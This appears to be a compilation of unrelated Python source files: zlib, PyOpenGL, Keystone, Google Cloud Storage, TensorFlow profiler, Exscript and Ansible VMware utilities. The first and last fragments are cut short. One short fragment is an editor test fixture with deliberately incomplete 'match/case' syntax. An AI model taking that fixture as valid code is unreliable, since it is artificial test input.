return self._c_do.zst.get_state()
def decompressobj(z_stream_state=None, wbits=zlib.MAX_WBITS):
"""Returns a custom Decompress object instance."""
do = Decompress(decompress_obj=zlib.decompressobj(wbits))
if z_stream_state is not None:
do.set_state(z_stream_state)
return do
class VersionError(Exception):
"""Exception used for version mismatch in z_stream.set_state."""
|
'''OpenGL extension KHR.surfaceless_context
This module customises the behaviour of the
OpenGL.raw.EGL.KHR.surfaceless_context to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/KHR/surfaceless_context.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.EGL import _types, _glgets
from OpenGL.raw.EGL.KHR.surfaceless_context import *
from OpenGL.raw.EGL.KHR.surfaceless_context import _EXTENSION_NAME
def glInitSurfacelessContextKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
|
#-------------------------------------------------------------------------
|
"""This module is deprecated."""
from oslo_cache.backends import memcache_pool
from oslo_log import versionutils
@versionutils.deprecated(
versionutils.deprecated.MITAKA,
what='keystone.cache.memcache_pool backend',
in_favor_of='oslo_cache.memcache_pool backend',
remove_in=+1)
class PooledMemcachedBackend(memcache_pool.PooledMemcachedBackend):
pass
|
match x:
case 1:
pass
case
case 3:
pass
case<caret>
|
"""File Interface for Google Cloud Storage."""
from __future__ import with_statement
__all__ = ['copy2',
'delete',
'listbucket',
'open',
'stat',
'compose',
'get_location',
'get_storage_class',
]
import logging
import StringIO
import urllib
import os
import itertools
import types
import xml.etree.cElementTree as ET
from . import api_utils
from . import common
from . import errors
from . import storage_api
def open(filename,
mode='r',
content_type=None,
options=None,
read_buffer_size=storage_api.ReadBuffer.DEFAULT_BUFFER_SIZE,
retry_params=None,
_account_id=None,
offset=0):
"""Opens a Google Cloud Storage file and returns it as a File-like object.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
mode: 'r' for reading mode. 'w' for writing mode.
In reading mode, the file must exist. In writing mode, a file will
be created or be overrode.
content_type: The MIME type of the file. str. Only valid in writing mode.
options: A str->basestring dict to specify additional headers to pass to
GCS e.g. {'x-goog-acl': 'private', 'x-goog-meta-foo': 'foo'}.
Supported options are x-goog-acl, x-goog-meta-, cache-control,
content-disposition, and content-encoding.
Only valid in writing mode.
See https://developers.google.com/storage/docs/reference-headers
for details.
read_buffer_size: The buffer size for read. Read keeps a buffer
and prefetches another one. To minimize blocking for large files,
always read by buffer size. To minimize number of RPC requests for
small files, set a large buffer size. Max is 30MB.
retry_params: An instance of api_utils.RetryParams for subsequent calls
to GCS from this file handle. If None, the default one is used.
_account_id: Internal-use only.
offset: Number of bytes to skip at the start of the file. If None, 0 is
used.
Returns:
A reading or writing buffer that supports File-like interface. Buffer
must be closed after operations are done.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
ValueError: invalid open mode or if content_type or options are specified
in reading mode.
"""
common.validate_file_path(filename)
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
filename = api_utils._quote_filename(filename)
if mode == 'w':
common.validate_options(options)
return storage_api.StreamingBuffer(api, filename, content_type, options)
elif mode == 'r':
if content_type or options:
raise ValueError('Options and content_type can only be specified '
'for writing mode.')
return storage_api.ReadBuffer(api,
filename,
buffer_size=read_buffer_size,
offset=offset)
else:
raise ValueError('Invalid mode %s.' % mode)
def delete(filename, retry_params=None, _account_id=None):
"""Delete a Google Cloud Storage file.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Raises:
errors.NotFoundError: if the file doesn't exist prior to deletion.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
common.validate_file_path(filename)
filename = api_utils._quote_filename(filename)
status, resp_headers, content = api.delete_object(filename)
errors.check_status(status, [204], filename, resp_headers=resp_headers,
body=content)
def get_location(bucket, retry_params=None, _account_id=None):
"""Returns the location for the given bucket.
https://cloud.google.com/storage/docs/bucket-locations
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The location as a string.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
return _get_bucket_attribute(bucket,
'location',
'LocationConstraint',
retry_params=retry_params,
_account_id=_account_id)
def get_storage_class(bucket, retry_params=None, _account_id=None):
"""Returns the storage class for the given bucket.
https://cloud.google.com/storage/docs/storage-classes
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The storage class as a string.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
return _get_bucket_attribute(bucket,
'storageClass',
'StorageClass',
retry_params=retry_params,
_account_id=_account_id)
def _get_bucket_attribute(bucket,
query_param,
xml_response_tag,
retry_params=None,
_account_id=None):
"""Helper method to request a bucket parameter and parse the response.
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
query_param: The query parameter to include in the get bucket request.
xml_response_tag: The expected tag in the xml response.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The xml value as a string. None if the returned xml does not match expected
format.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
common.validate_bucket_path(bucket)
status, headers, content = api.get_bucket('%s?%s' % (bucket, query_param))
errors.check_status(status, [200], bucket, resp_headers=headers, body=content)
root = ET.fromstring(content)
if root.tag == xml_response_tag and root.text:
return root.text
return None
def stat(filename, retry_params=None, _account_id=None):
"""Get GCSFileStat of a Google Cloud storage file.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
a GCSFileStat object containing info about this file.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
"""
common.validate_file_path(filename)
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
status, headers, content = api.head_object(
api_utils._quote_filename(filename))
errors.check_status(status, [200], filename, resp_headers=headers,
body=content)
file_stat = common.GCSFileStat(
filename=filename,
st_size=common.get_stored_content_length(headers),
st_ctime=common.http_time_to_posix(headers.get('last-modified')),
etag=headers.get('etag'),
content_type=headers.get('content-type'),
metadata=common.get_metadata(headers))
return file_stat
def copy2(src, dst, metadata=None, retry_params=None):
"""Copy the file content from src to dst.
Args:
src: /bucket/filename
dst: /bucket/filename
metadata: a dict of metadata for this copy. If None, old metadata is copied.
For example, {'x-goog-meta-foo': 'bar'}.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
"""
common.validate_file_path(src)
common.validate_file_path(dst)
if metadata is None:
metadata = {}
copy_meta = 'COPY'
else:
copy_meta = 'REPLACE'
metadata.update({'x-goog-copy-source': src,
'x-goog-metadata-directive': copy_meta})
api = storage_api._get_storage_api(retry_params=retry_params)
status, resp_headers, content = api.put_object(
api_utils._quote_filename(dst), headers=metadata)
errors.check_status(status, [200], src, metadata, resp_headers, body=content)
def listbucket(path_prefix, marker=None, prefix=None, max_keys=None,
delimiter=None, retry_params=None, _account_id=None):
"""Returns a GCSFileStat iterator over a bucket.
Optional arguments can limit the result to a subset of files under bucket.
This function has two modes:
1. List bucket mode: Lists all files in the bucket without any concept of
hierarchy. GCS doesn't have real directory hierarchies.
2. Directory emulation mode: If you specify the 'delimiter' argument,
it is used as a path separator to emulate a hierarchy of directories.
In this mode, the "path_prefix" argument should end in the delimiter
specified (thus designates a logical directory). The logical directory's
contents, both files and subdirectories, are listed. The names of
subdirectories returned will end with the delimiter. So listbucket
can be called with the subdirectory name to list the subdirectory's
contents.
Args:
path_prefix: A Google Cloud Storage path of format "/bucket" or
"/bucket/prefix". Only objects whose fullpath starts with the
path_prefix will be returned.
marker: Another path prefix. Only objects whose fullpath starts
lexicographically after marker will be returned (exclusive).
prefix: Deprecated. Use path_prefix.
max_keys: The limit on the number of objects to return. int.
For best performance, specify max_keys only if you know how many objects
you want. Otherwise, this method requests large batches and handles
pagination for you.
delimiter: Use to turn on directory mode. str of one or multiple chars
that your bucket uses as its directory separator.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Examples:
For files "/bucket/a",
"/bucket/bar/1"
"/bucket/foo",
"/bucket/foo/1", "/bucket/foo/2/1", "/bucket/foo/3/1",
Regular mode:
listbucket("/bucket/f", marker="/bucket/foo/1")
will match "/bucket/foo/2/1", "/bucket/foo/3/1".
Directory mode:
listbucket("/bucket/", delimiter="/")
will match "/bucket/a, "/bucket/bar/" "/bucket/foo", "/bucket/foo/".
listbucket("/bucket/foo/", delimiter="/")
will match "/bucket/foo/1", "/bucket/foo/2/", "/bucket/foo/3/"
Returns:
Regular mode:
A GCSFileStat iterator over matched files ordered by filename.
The iterator returns GCSFileStat objects. filename, etag, st_size,
st_ctime, and is_dir are set.
Directory emulation mode:
A GCSFileStat iterator over matched files and directories ordered by
name. The iterator returns GCSFileStat objects. For directories,
only the filename and is_dir fields are set.
The last name yielded can be used as next call's marker.
"""
if prefix:
common.validate_bucket_path(path_prefix)
bucket = path_prefix
else:
bucket, prefix = common._process_path_prefix(path_prefix)
if marker and marker.startswith(bucket):
marker = marker[len(bucket) + 1:]
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
options = {}
if marker:
options['marker'] = marker
if max_keys:
options['max-keys'] = max_keys
if prefix:
options['prefix'] = prefix
if delimiter:
options['delimiter'] = delimiter
return _Bucket(api, bucket, options)
def compose(list_of_files, destination_file, files_metadata=None,
content_type=None, retry_params=None, _account_id=None):
"""Runs the GCS Compose on the given files.
Merges between 2 and 32 files into one file. Composite files may even
be built from other existing composites, provided that the total
component count does not exceed 1024. See here for details:
https://cloud.google.com/storage/docs/composite-objects
Args:
list_of_files: List of file name strings with no leading slashes or bucket.
destination_file: Path to the output file. Must have the bucket in the path.
files_metadata: Optional, file metadata, order must match list_of_files,
see link for available options:
https://cloud.google.com/storage/docs/composite-objects#_Xml
content_type: Optional, used to specify content-header of the output file.
retry_params: Optional, an api_utils.RetryParams for this call to GCS.
If None,the default one is used.
_account_id: Internal-use only.
Raises:
ValueError: If the number of files is outside the range of 2-32.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
if os.getenv('SERVER_SOFTWARE').startswith('Dev'):
def _temp_func(file_list, destination_file, content_type):
bucket = '/' + destination_file.split('/')[1] + '/'
with open(destination_file, 'w', content_type=content_type) as gcs_merge:
for source_file in file_list:
with open(bucket + source_file['Name'], 'r') as gcs_source:
gcs_merge.write(gcs_source.read())
compose_object = _temp_func
else:
compose_object = api.compose_object
file_list, _ = _validate_compose_list(destination_file,
list_of_files,
files_metadata, 32)
compose_object(file_list, destination_file, content_type)
def _file_exists(destination):
"""Checks if a file exists.
Tries to open the file.
If it succeeds returns True otherwise False.
Args:
destination: Full path to the file (ie. /bucket/object) with leading slash.
Returns:
True if the file is accessible otherwise False.
"""
try:
with open(destination, "r"):
return True
except errors.NotFoundError:
return False
def _validate_compose_list(destination_file, file_list,
files_metadata=None, number_of_files=32):
"""Validates the file_list and merges the file_list, files_metadata.
Args:
destination: Path to the file (ie. /destination_bucket/destination_file).
file_list: List of files to compose, see compose for details.
files_metadata: Meta details for each file in the file_list.
number_of_files: Maximum number of files allowed in the list.
Returns:
A tuple (list_of_files, bucket):
list_of_files: Ready to use dict version of the list.
bucket: bucket name extracted from the file paths.
"""
common.validate_file_path(destination_file)
bucket = destination_file[0:(destination_file.index('/', 1) + 1)]
try:
if isinstance(file_list, types.StringTypes):
raise TypeError
list_len = len(file_list)
except TypeError:
raise TypeError('file_list must be a list')
if list_len > number_of_files:
raise ValueError(
'Compose attempted to create composite with too many'
'(%i) components; limit is (%i).' % (list_len, number_of_files))
if list_len <= 0:
raise ValueError('Compose operation requires at'
' least one component; 0 provided.')
if files_metadata is None:
files_metadata = []
elif len(files_metadata) > list_len:
raise ValueError('files_metadata contains more entries(%i)'
' than file_list(%i)'
% (len(files_metadata), list_len))
list_of_files = []
for source_file, meta_data in itertools.izip_longest(file_list,
files_metadata):
if not isinstance(source_file, str):
raise TypeError('Each item of file_list must be a string')
if source_file.startswith('/'):
logging.warn('Detected a "/" at the start of the file, '
'Unless the file name contains a "/" it '
' may cause files to be misread')
if source_file.startswith(bucket):
logging.warn('Detected bucket name at the start of the file, '
'must not specify the bucket when listing file_names.'
' May cause files to be misread')
common.validate_file_path(bucket + source_file)
list_entry = {}
if meta_data is not None:
list_entry.update(meta_data)
list_entry['Name'] = source_file
list_of_files.append(list_entry)
return list_of_files, bucket
class _Bucket(object):
"""A wrapper for a GCS bucket as the return value of listbucket."""
def __init__(self, api, path, options):
"""Initialize.
Args:
api: storage_api instance.
path: bucket path of form '/bucket'.
options: a dict of listbucket options. Please see listbucket doc.
"""
self._init(api, path, options)
def _init(self, api, path, options):
self._api = api
self._path = path
self._options = options.copy()
self._get_bucket_fut = self._api.get_bucket_async(
self._path + '?' + urllib.urlencode(self._options))
self._last_yield = None
self._new_max_keys = self._options.get('max-keys')
def __getstate__(self):
options = self._options
if self._last_yield:
options['marker'] = self._last_yield.filename[len(self._path) + 1:]
if self._new_max_keys is not None:
options['max-keys'] = self._new_max_keys
return {'api': self._api,
'path': self._path,
'options': options}
def __setstate__(self, state):
self._init(state['api'], state['path'], state['options'])
def __iter__(self):
"""Iter over the bucket.
Yields:
GCSFileStat: a GCSFileStat for an object in the bucket.
They are ordered by GCSFileStat.filename.
"""
total = 0
max_keys = self._options.get('max-keys')
while self._get_bucket_fut:
status, resp_headers, content = self._get_bucket_fut.get_result()
errors.check_status(status, [200], self._path, resp_headers=resp_headers,
body=content, extras=self._options)
if self._should_get_another_batch(content):
self._get_bucket_fut = self._api.get_bucket_async(
self._path + '?' + urllib.urlencode(self._options))
else:
self._get_bucket_fut = None
root = ET.fromstring(content)
dirs = self._next_dir_gen(root)
files = self._next_file_gen(root)
next_file = files.next()
next_dir = dirs.next()
while ((max_keys is None or total < max_keys) and
not (next_file is None and next_dir is None)):
total += 1
if next_file is None:
self._last_yield = next_dir
next_dir = dirs.next()
elif next_dir is None:
self._last_yield = next_file
next_file = files.next()
elif next_dir < next_file:
self._last_yield = next_dir
next_dir = dirs.next()
elif next_file < next_dir:
self._last_yield = next_file
next_file = files.next()
else:
logging.error(
'Should never reach. next file is %r. next dir is %r.',
next_file, next_dir)
if self._new_max_keys:
self._new_max_keys -= 1
yield self._last_yield
def _next_file_gen(self, root):
"""Generator for next file element in the document.
Args:
root: root element of the XML tree.
Yields:
GCSFileStat for the next file.
"""
for e in root.getiterator(common._T_CONTENTS):
st_ctime, size, etag, key = None, None, None, None
for child in e.getiterator('*'):
if child.tag == common._T_LAST_MODIFIED:
st_ctime = common.dt_str_to_posix(child.text)
elif child.tag == common._T_ETAG:
etag = child.text
elif child.tag == common._T_SIZE:
size = child.text
elif child.tag == common._T_KEY:
key = child.text
yield common.GCSFileStat(self._path + '/' + key,
size, etag, st_ctime)
e.clear()
yield None
def _next_dir_gen(self, root):
"""Generator for next directory element in the document.
Args:
root: root element in the XML tree.
Yields:
GCSFileStat for the next directory.
"""
for e in root.getiterator(common._T_COMMON_PREFIXES):
yield common.GCSFileStat(
self._path + '/' + e.find(common._T_PREFIX).text,
st_size=None, etag=None, st_ctime=None, is_dir=True)
e.clear()
yield None
def _should_get_another_batch(self, content):
"""Whether to issue another GET bucket call.
Args:
content: response XML.
Returns:
True if should, also update self._options for the next request.
False otherwise.
"""
if ('max-keys' in self._options and
self._options['max-keys'] <= common._MAX_GET_BUCKET_RESULT):
return False
elements = self._find_elements(
content, set([common._T_IS_TRUNCATED,
common._T_NEXT_MARKER]))
if elements.get(common._T_IS_TRUNCATED, 'false').lower() != 'true':
return False
next_marker = elements.get(common._T_NEXT_MARKER)
if next_marker is None:
self._options.pop('marker', None)
return False
self._options['marker'] = next_marker
return True
def _find_elements(self, result, elements):
"""Find interesting elements from XML.
This function tries to only look for specified elements
without parsing the entire XML. The specified elements is better
located near the beginning.
Args:
result: response XML.
elements: a set of interesting element tags.
Returns:
A dict from element tag to element value.
"""
element_mapping = {}
result = StringIO.StringIO(result)
for _, e in ET.iterparse(result, events=('end',)):
if not elements:
break
if e.tag in elements:
element_mapping[e.tag] = e.text
elements.remove(e.tag)
return element_mapping
|
"""A test lib that defines some models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import variable_scope
from tensorflow.python.profiler import model_analyzer
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import _pywrap_tfprof as print_mdl
from tensorflow.python.util import compat
def BuildSmallModel():
"""Build a small forward conv model."""
image = array_ops.zeros([2, 6, 6, 3])
_ = variable_scope.get_variable(
'ScalarW', [],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
kernel = variable_scope.get_variable(
'DW', [3, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
x = nn_ops.conv2d(image, kernel, [1, 2, 2, 1], padding='SAME')
kernel = variable_scope.get_variable(
'DW2', [2, 2, 6, 12],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
x = nn_ops.conv2d(x, kernel, [1, 2, 2, 1], padding='SAME')
return x
def BuildFullModel():
"""Build the full model with conv,rnn,opt."""
seq = []
for i in range(4):
with variable_scope.variable_scope('inp_%d' % i):
seq.append(array_ops.reshape(BuildSmallModel(), [2, 1, -1]))
cell = rnn_cell.BasicRNNCell(16)
out = rnn.dynamic_rnn(
cell, array_ops.concat(seq, axis=1), dtype=dtypes.float32)[0]
target = array_ops.ones_like(out)
loss = nn_ops.l2_loss(math_ops.reduce_mean(target - out))
sgd_op = gradient_descent.GradientDescentOptimizer(1e-2)
return sgd_op.minimize(loss)
def BuildSplittableModel():
"""Build a small model that can be run partially in each step."""
image = array_ops.zeros([2, 6, 6, 3])
kernel1 = variable_scope.get_variable(
'DW', [3, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
r1 = nn_ops.conv2d(image, kernel1, [1, 2, 2, 1], padding='SAME')
kernel2 = variable_scope.get_variable(
'DW2', [2, 3, 3, 6],
dtypes.float32,
initializer=init_ops.random_normal_initializer(stddev=0.001))
r2 = nn_ops.conv2d(image, kernel2, [1, 2, 2, 1], padding='SAME')
r3 = r1 + r2
return r1, r2, r3
def SearchTFProfNode(node, name):
"""Search a node in the tree."""
if node.name == name:
return node
for c in node.children:
r = SearchTFProfNode(c, name)
if r: return r
return None
@contextlib.contextmanager
def ProfilerFromFile(profile_file):
"""Initialize a profiler from profile file."""
print_mdl.ProfilerFromFile(compat.as_bytes(profile_file))
profiler = model_analyzer.Profiler.__new__(model_analyzer.Profiler)
yield profiler
print_mdl.DeleteProfiler()
def CheckAndRemoveDoc(profile):
assert 'Doc:' in profile
start_pos = profile.find('Profile:')
return profile[start_pos + 9:]
|
class Settings(object):
def __init__(self):
self.radioB = "*googlechrome"
self.browserPath = ""
self.ipAddr = "ci.eden.sahanafoundation.org"
self.ipPort = 4444
self.URL = "http://postgresql.eden.sahanafoundation.org/"
self.app = "postgresql/"
|
import sys
import threading
import multiprocessing
from copy import copy
from functools import partial
from multiprocessing import Pipe
from Exscript.util.impl import serializeable_sys_exc_info
class _ChildWatcher(threading.Thread):
def __init__(self, child, callback):
threading.Thread.__init__(self)
self.child = child
self.cb = callback
def __copy__(self):
watcher = _ChildWatcher(copy(self.child), self.cb)
return watcher
def run(self):
to_child, to_self = Pipe()
try:
self.child.start(to_self)
result = to_child.recv()
self.child.join()
except:
result = sys.exc_info()
finally:
to_child.close()
to_self.close()
if result == '':
self.cb(None)
else:
self.cb(result)
def _make_process_class(base, clsname):
class process_cls(base):
def __init__(self, id, function, name, data):
base.__init__(self, name = name)
self.id = id
self.pipe = None
self.function = function
self.failures = 0
self.data = data
def run(self):
"""
Start the associated function.
"""
try:
self.function(self)
except:
self.pipe.send(serializeable_sys_exc_info())
else:
self.pipe.send('')
finally:
self.pipe = None
def start(self, pipe):
self.pipe = pipe
base.start(self)
process_cls.__name__ = clsname
return process_cls
Thread = _make_process_class(threading.Thread, 'Thread')
Process = _make_process_class(multiprocessing.Process, 'Process')
class Job(object):
__slots__ = ('id',
'func',
'name',
'times',
'failures',
'data',
'child',
'watcher')
def __init__(self, function, name, times, data):
self.id = None
self.func = function
self.name = name is None and str(id(function)) or name
self.times = times
self.failures = 0
self.data = data
self.child = None
self.watcher = None
def start(self, child_cls, on_complete):
self.child = child_cls(self.id, self.func, self.name, self.data)
self.child.failures = self.failures
self.watcher = _ChildWatcher(self.child, partial(on_complete, self))
self.watcher.start()
def join(self):
self.watcher.join()
self.child = None
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import atexit
import os
import re
import ssl
import time
import traceback
from random import randint
REQUESTS_IMP_ERR = None
try:
# requests is required for exception handling of the ConnectionError
import requests
HAS_REQUESTS = True
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
HAS_REQUESTS = False
PYVMOMI_IMP_ERR = None
try:
from pyVim import connect
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
PYVMOMI_IMP_ERR = traceback.format_exc()
HAS_PYVMOMI = False
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.six import integer_types, iteritems, string_types, raise_from
from ansible.module_utils.basic import env_fallback, missing_required_lib
class TaskError(Exception):
def __init__(self, *args, **kwargs):
super(TaskError, self).__init__(*args, **kwargs)
def wait_for_task(task, max_backoff=64, timeout=3600):
"""Wait for given task using exponential back-off algorithm.
Args:
task: VMware task object
max_backoff: Maximum amount of sleep time in seconds
timeout: Timeout for the given task in seconds
Returns: Tuple with True and result for successful task
Raises: TaskError on failure
"""
failure_counter = 0
start_time = time.time()
while True:
if time.time() - start_time >= timeout:
raise TaskError("Timeout")
if task.info.state == vim.TaskInfo.State.success:
return True, task.info.result
if task.info.state == vim.TaskInfo.State.error:
error_msg = task.info.error
host_thumbprint = None
try:
error_msg = error_msg.msg
if hasattr(task.info.error, 'thumbprint'):
host_thumbprint = task.info.error.thumbprint
except AttributeError:
pass
finally:
raise_from(TaskError(error_msg, host_thumbprint), task.info.error)
if task.info.state in [vim.TaskInfo.State.running, vim.TaskInfo.State.queued]:
sleep_time = min(2 ** failure_counter + randint(1, 1000) / 1000, max_backoff)
time.sleep(sleep_time)
failure_counter += 1
def wait_for_vm_ip(content, vm, timeout=300):
facts = dict()
interval = 15
while timeout > 0:
_facts = gather_vm_facts(content, vm)
if _facts['ipv4'] or _facts['ipv6']:
facts = _facts
break
time.sleep(interval)
timeout -= interval
return facts
def find_obj(content, vimtype, name, first=True, folder=None):
container = content.viewManager.CreateContainerView(folder or content.rootFolder, recursive=True, type=vimtype)
# Get all objects matching type (and name if given)
obj_list = [obj for obj in container.view if not name or to_text(obj.name) == to_text(name)]
container.Destroy()
# Return first match or None
if first:
if obj_list:
return obj_list[0]
return None
# Return all matching objects or empty list
return obj_list
def find_dvspg_by_name(dv_switch, portgroup_name):
portgroups = dv_switch.portgroup
for pg in portgroups:
if pg.name == portgroup_name:
return pg
return None
def find_object_by_name(content, name, obj_type, folder=None, recurse=True):
if not isinstance(obj_type, list):
obj_type = [obj_type]
objects = get_all_objs(content, obj_type, folder=folder, recurse=recurse)
for obj in objects:
if obj.name == name:
return obj
return None
def find_cluster_by_name(content, cluster_name, datacenter=None):
if datacenter:
folder = datacenter.hostFolder
else:
folder = content.rootFolder
return find_object_by_name(content, cluster_name, [vim.ClusterComputeResource], folder=folder)
def find_datacenter_by_name(content, datacenter_name):
return find_object_by_name(content, datacenter_name, [vim.Datacenter])
def get_parent_datacenter(obj):
""" Walk the parent tree to find the objects datacenter """
if isinstance(obj, vim.Datacenter):
return obj
datacenter = None
while True:
if not hasattr(obj, 'parent'):
break
obj = obj.parent
if isinstance(obj, vim.Datacenter):
datacenter = obj
break
return datacenter
def find_datastore_by_name(content, datastore_name):
return find_object_by_name(content, datastore_name, [vim.Datastore])
def find_dvs_by_name(content, switch_name):
return find_object_by_name(content, switch_name, [vim.DistributedVirtualSwitch])
def find_hostsystem_by_name(content, hostname):
return find_object_by_name(content, hostname, [vim.HostSystem])
def find_resource_pool_by_name(content, resource_pool_name):
return find_object_by_name(content, resource_pool_name, [vim.ResourcePool])
def find_network_by_name(content, network_name):
return find_object_by_name(content, network_name, [vim.Network])
def find_vm_by_id(content, vm_id, vm_id_type="vm_name", datacenter=None, cluster=None, folder=None, match_first=False):
""" UUID is unique to a VM, every other id returns the first match. """
si = content.searchIndex
vm = None
if vm_id_type == 'dns_name':
vm = si.FindByDnsName(datacenter=datacenter, dnsName=vm_id, vmSearch=True)
elif vm_id_type == 'uuid':
# Search By BIOS UUID rather than instance UUID
vm = si.FindByUuid(datacenter=datacenter, instanceUuid=False, uuid=vm_id, vmSearch=True)
elif vm_id_type == 'ip':
vm = si.FindByIp(datacenter=datacenter, ip=vm_id, vmSearch=True)
elif vm_id_type == 'vm_name':
folder = None
if cluster:
folder = cluster
elif datacenter:
folder = datacenter.hostFolder
vm = find_vm_by_name(content, vm_id, folder)
elif vm_id_type == 'inventory_path':
searchpath = folder
# get all objects for this path
f_obj = si.FindByInventoryPath(searchpath)
if f_obj:
if isinstance(f_obj, vim.Datacenter):
f_obj = f_obj.vmFolder
for c_obj in f_obj.childEntity:
if not isinstance(c_obj, vim.VirtualMachine):
continue
if c_obj.name == vm_id:
vm = c_obj
if match_first:
break
return vm
def find_vm_by_name(content, vm_name, folder=None, recurse=True):
return find_object_by_name(content, vm_name, [vim.VirtualMachine], folder=folder, recurse=recurse)
def find_host_portgroup_by_name(host, portgroup_name):
for portgroup in host.config.network.portgroup:
if portgroup.spec.name == portgroup_name:
return portgroup
return None
def compile_folder_path_for_object(vobj):
""" make a /vm/foo/bar/baz like folder path for an object """
paths = []
if isinstance(vobj, vim.Folder):
paths.append(vobj.name)
thisobj = vobj
while hasattr(thisobj, 'parent'):
thisobj = thisobj.parent
try:
moid = thisobj._moId
except AttributeError:
moid = None
if moid in ['group-d1', 'ha-folder-root']:
break
if isinstance(thisobj, vim.Folder):
paths.append(thisobj.name)
paths.reverse()
return '/' + '/'.join(paths)
def _get_vm_prop(vm, attributes):
"""Safely get a property or return None"""
result = vm
for attribute in attributes:
try:
result = getattr(result, attribute)
except (AttributeError, IndexError):
return None
return result
def gather_vm_facts(content, vm):
""" Gather facts from vim.VirtualMachine object. """
facts = {
'module_hw': True,
'hw_name': vm.config.name,
'hw_power_status': vm.summary.runtime.powerState,
'hw_guest_full_name': vm.summary.guest.guestFullName,
'hw_guest_id': vm.summary.guest.guestId,
'hw_product_uuid': vm.config.uuid,
'hw_processor_count': vm.config.hardware.numCPU,
'hw_cores_per_socket': vm.config.hardware.numCoresPerSocket,
'hw_memtotal_mb': vm.config.hardware.memoryMB,
'hw_interfaces': [],
'hw_datastores': [],
'hw_files': [],
'hw_esxi_host': None,
'hw_guest_ha_state': None,
'hw_is_template': vm.config.template,
'hw_folder': None,
'hw_version': vm.config.version,
'instance_uuid': vm.config.instanceUuid,
'guest_tools_status': _get_vm_prop(vm, ('guest', 'toolsRunningStatus')),
'guest_tools_version': _get_vm_prop(vm, ('guest', 'toolsVersion')),
'guest_question': vm.summary.runtime.question,
'guest_consolidation_needed': vm.summary.runtime.consolidationNeeded,
'ipv4': None,
'ipv6': None,
'annotation': vm.config.annotation,
'customvalues': {},
'snapshots': [],
'current_snapshot': None,
'vnc': {},
}
# facts that may or may not exist
if vm.summary.runtime.host:
try:
host = vm.summary.runtime.host
facts['hw_esxi_host'] = host.summary.config.name
except vim.fault.NoPermission:
# User does not have read permission for the host system,
# proceed without this value. This value does not contribute or hamper
# provisioning or power management operations.
pass
if vm.summary.runtime.dasVmProtection:
facts['hw_guest_ha_state'] = vm.summary.runtime.dasVmProtection.dasProtected
datastores = vm.datastore
for ds in datastores:
facts['hw_datastores'].append(ds.info.name)
try:
files = vm.config.files
layout = vm.layout
if files:
facts['hw_files'] = [files.vmPathName]
for item in layout.snapshot:
for snap in item.snapshotFile:
if 'vmsn' in snap:
facts['hw_files'].append(snap)
for item in layout.configFile:
facts['hw_files'].append(os.path.join(os.path.dirname(files.vmPathName), item))
for item in vm.layout.logFile:
facts['hw_files'].append(os.path.join(files.logDirectory, item))
for item in vm.layout.disk:
for disk in item.diskFile:
facts['hw_files'].append(disk)
except Exception:
pass
facts['hw_folder'] = PyVmomi.get_vm_path(content, vm)
cfm = content.customFieldsManager
# Resolve custom values
for value_obj in vm.summary.customValue:
kn = value_obj.key
if cfm is not None and cfm.field:
for f in cfm.field:
if f.key == value_obj.key:
kn = f.name
# Exit the loop immediately, we found it
break
facts['customvalues'][kn] = value_obj.value
net_dict = {}
vmnet = _get_vm_prop(vm, ('guest', 'net'))
if vmnet:
for device in vmnet:
